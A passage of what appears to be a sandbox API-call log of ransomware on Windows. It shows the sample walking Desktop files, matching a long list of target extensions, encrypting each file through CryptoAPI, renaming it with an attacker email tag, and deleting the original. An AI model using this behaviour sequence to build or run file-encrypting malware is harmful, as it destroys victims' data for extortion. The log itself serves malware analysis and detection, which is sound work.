.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".avi") returned 0x0
	[0182.106] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c724d90, ftCreationTime.dwHighDateTime=0x1d969f4, ftLastAccessTime.dwLowDateTime=0x827152b0, ftLastAccessTime.dwHighDateTime=0x1d97518, ftLastWriteTime.dwLowDateTime=0x827152b0, ftLastWriteTime.dwHighDateTime=0x1d97518, nFileSizeHigh=0x0, nFileSizeLow=0x905d, dwReserved0=0x0, dwReserved1=0x0, cFileName="JtOoxm BUypXvtBQV.bmp", cAlternateFileName="JTOOXM~1.BMP")) returned 1
	[0182.106] lstrcmpW (lpString1="JtOoxm BUypXvtBQV.bmp", lpString2="..") returned 1
	[0182.106] lstrcmpW (lpString1="JtOoxm BUypXvtBQV.bmp", lpString2=".") returned 1
	[0182.106] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	[0182.106] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="JtOoxm BUypXvtBQV.bmp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\JtOoxm BUypXvtBQV.bmp") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\JtOoxm BUypXvtBQV.bmp"
	[0182.106] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\JtOoxm BUypXvtBQV.bmp") returned 51
	[0182.107] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0182.107] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\JtOoxm BUypXvtBQV.bmp", cchLength=0x33 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\jtooxm buypxvtbqv.bmp") returned 0x33
	[0182.107] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.107] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\jtooxm buypxvtbqv.bmp", lpSrch="help_decrypt_your_files") returned 0x0
	[0182.107] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\jtooxm buypxvtbqv.bmp" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\jtooxm buypxvtbqv.bmp") returned="c:\\users\\rdhj0cnfevzx\\desktop\\jtooxm buypxvtbqv.bmp"
	[0182.107] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\jtooxm buypxvtbqv.bmp") returned 51
	[0182.107] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.108] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.108] StrStrW (lpFirst=".bmp", lpSrch=".") returned=".bmp"
	[0182.108] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.108] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".bmp") returned=".bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0182.108] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0182.108] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0182.108] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\jtooxm buypxvtbqv.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\jtooxm buypxvtbqv.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0182.239] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x905d, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x905d, lpOverlapped=0x0) returned 1
	[0182.242] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.242] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb198) returned 1
	[0182.244] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.245] CryptCreateHash (in: hProv=0xfcb198, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0182.245] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.245] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0182.245] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.245] CryptDeriveKey (in: hProv=0xfcb198, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9b30) returned 1
	[0182.245] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.245] CryptEncrypt (in: hKey=0xfb9b30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x905d, dwBufLen=0x905d | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x9060) returned 1
	[0182.247] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.247] RtlMoveMemory (in: Destination=0xfe61e8, Source=0xfdd180, Length=0x905d | out: Destination=0xfe61e8) 
	[0182.247] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.247] CryptEncrypt (in: hKey=0xfb9b30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe61e8*, pdwDataLen=0x18bc0c*=0x905d, dwBufLen=0x9060 | out: pbData=0xfe61e8*, pdwDataLen=0x18bc0c*=0x9060) returned 1
	[0182.250] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.250] CryptDestroyKey (hKey=0xfb9b30) returned 1
	[0182.250] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.250] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0182.250] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.266] CryptReleaseContext (hProv=0xfcb198, dwFlags=0x0) returned 1
	[0182.266] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.266] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0182.267] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.267] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0182.270] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\jtooxm buypxvtbqv.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 93
	[0182.270] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\jtooxm buypxvtbqv.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\jtooxm buypxvtbqv.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0182.271] WriteFile (in: hFile=0x388, lpBuffer=0xfe61e8*, nNumberOfBytesToWrite=0x9060, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfe61e8*, lpNumberOfBytesWritten=0x18c068*=0x9060, lpOverlapped=0x0) returned 1
	[0182.275] CloseHandle (hObject=0x388) returned 1
	[0182.275] CloseHandle (hObject=0x384) returned 1
	[0182.275] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\jtooxm buypxvtbqv.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\jtooxm buypxvtbqv.bmp")) returned 1
	[0182.284] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\jtooxm buypxvtbqv.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\jtooxm buypxvtbqv.bmp")) returned 0
	[0182.284] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49efea10, ftCreationTime.dwHighDateTime=0x1d96eeb, ftLastAccessTime.dwLowDateTime=0xbd462400, ftLastAccessTime.dwHighDateTime=0x1d9761d, ftLastWriteTime.dwLowDateTime=0xbd462400, ftLastWriteTime.dwHighDateTime=0x1d9761d, nFileSizeHigh=0x0, nFileSizeLow=0x93b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="kXRID- cwUq07pxV_.avi", cAlternateFileName="KXRID-~1.AVI")) returned 1
	[0182.284] lstrcmpW (lpString1="kXRID- cwUq07pxV_.avi", lpString2="..") returned 1
	[0182.284] lstrcmpW (lpString1="kXRID- cwUq07pxV_.avi", lpString2=".") returned 1
	[0182.284] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	[0182.284] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="kXRID- cwUq07pxV_.avi" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\kXRID- cwUq07pxV_.avi") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\kXRID- cwUq07pxV_.avi"
	[0182.284] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\kXRID- cwUq07pxV_.avi") returned 51
	[0182.284] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0182.285] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\kXRID- cwUq07pxV_.avi", cchLength=0x33 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\kxrid- cwuq07pxv_.avi") returned 0x33
	[0182.285] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.285] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\kxrid- cwuq07pxv_.avi", lpSrch="help_decrypt_your_files") returned 0x0
	[0182.285] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\kxrid- cwuq07pxv_.avi" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\kxrid- cwuq07pxv_.avi") returned="c:\\users\\rdhj0cnfevzx\\desktop\\kxrid- cwuq07pxv_.avi"
	[0182.285] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\kxrid- cwuq07pxv_.avi") returned 51
	[0182.285] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.286] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.286] StrStrW (lpFirst=".avi", lpSrch=".") returned=".avi"
	[0182.286] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.286] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wp